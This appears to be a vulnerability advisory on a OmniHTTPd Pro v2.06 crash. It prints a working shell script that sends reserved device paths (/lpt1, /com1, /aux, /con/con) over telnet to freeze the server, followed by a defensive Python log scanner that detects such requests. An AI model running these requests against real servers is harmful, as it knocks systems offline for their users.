COMMAND
Omni httpd
SYSTEMS AFFECTED
Omni Httpd pro v.2.06 Win98 (NT not tested)
PROBLEM
Here is the exploit code to crash/freeze OmniHttpD Pro v2.06.
In-depth information on this particular bug can be found in a
securax advisory.
#!/bin/sh
#
# Vulnerable versions:
# Omni Httpd pro v.2.06 Win98 (NT not tested)
#
# The problem:
# It is possible to crash remote system because OmniHttpD
# (version: Pro. v2.06, maybe others) parse the path strings to call
# some FAT32/VFAT routines in the kernel which makes your system
# unstable and useless until next reboot.
#
# Fix:
# Unknown for now, I mailed Omnicron Technologies ... they will
# probably fix this bug in next version.
#
# About:
# Discovered by: sirius from b0f
# Coded by: sirius from buffer0vefl0w security (b0f)
# [http://b0f.freebsd.lublin.pl]
if [ "$1" = "" ]; then
echo "OmniHTTPd v.2.06 DoS attack"
echo
echo "Coded: sirius from buffer0vefl0w security (b0f)"
echo "[http://b0f.freebsd.lublin.pl]"
echo
echo "Usage: $0 <host> <port>"
echo
exit 1
fi
echo "Launching attack ... please wait "
# this will crash some devices, but if modem is on comX the code after
# line with comX will not be executed ... you can change the order of
# execution ;)
(echo "GET /lpt1" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
(echo "GET /lpt2" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
(echo "GET /com1" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
(echo "GET /com2" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
(echo "GET /com3" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
(echo "GET /com4" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
(echo "GET /com5" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
# the following code will crash/freeze/make system busy/how to call
# it? system
(echo "GET /aux" ; sleep 5) | telnet $1 80 1>/dev/null 2>/dev/null
(echo "GET /con/con" ; sleep 5) |telnet $1 80 1>/dev/null 2>/dev/null
echo "Crash code send ..."
killall -9 telnet 2>/dev/null 1> /dev/null
echo "Done!"
SOLUTION
Should be fixed.
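
A defensive check for the request pattern above, as an added example that is not part of the original advisory or of OmniHTTPd: it flags request paths in which any segment resolves to a reserved DOS device name, and it goes beyond the names used in the script to the full reserved set (CON, PRN, AUX, NUL, COM1-9, LPT1-9). The function names and the log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Reserved DOS device names on Windows. The script on this page requests
# lpt1, lpt2, com1-com5, aux and con; the rest complete the documented set.
RESERVED = {"CON", "PRN", "AUX", "NUL"} | {
    f"{prefix}{n}" for prefix in ("COM", "LPT") for n in range(1, 10)
}

# Request target of a logged request line; the HTTP version may be absent,
# as in the bare "GET /lpt1" requests sent by the script.
REQUEST_RE = re.compile(r'(?:GET|HEAD|POST)\s+([^\s"]+)')


def device_segments(path):
    """Return the path segments that resolve to a reserved device name."""
    decoded = unquote(path.split("?", 1)[0])  # drop query, undo %xx encoding
    hits = []
    for seg in re.split(r"[/\\]+", decoded):
        # Trailing dots/spaces and any extension do not change the device
        # a name resolves to: "aux.txt" is still AUX.
        base = seg.rstrip(". ").split(".", 1)[0].rstrip(" ").upper()
        if base in RESERVED:
            hits.append(seg)
    return hits


def scan(log_lines):
    """Return (line_number, path, hits) for every log line to reject or alert on."""
    findings = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if match and device_segments(match.group(1)):
            findings.append((number, match.group(1), device_segments(match.group(1))))
    return findings


# Constructed sample access log (addresses are documentation ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2000:00:00:01] "GET /index.html HTTP/1.0" 200 512',
    '192.0.2.44 - - [01/Jan/2000:00:00:02] "GET /lpt1" 0 0',
    '192.0.2.44 - - [01/Jan/2000:00:00:07] "GET /con/con" 0 0',
    '192.0.2.44 - - [01/Jan/2000:00:00:12] "GET /docs/%61ux.txt HTTP/1.0" 0 0',
    '192.0.2.10 - - [01/Jan/2000:00:00:20] "GET /console/config.html HTTP/1.0" 200 90',
]

if __name__ == "__main__":
    for number, path, hits in scan(SAMPLE_LOG):
        print(f"line {number}: {path} -> reserved segment(s) {hits}")
```

The same device_segments() test can run as a pre-routing filter that rejects the request before the path reaches any file-system call.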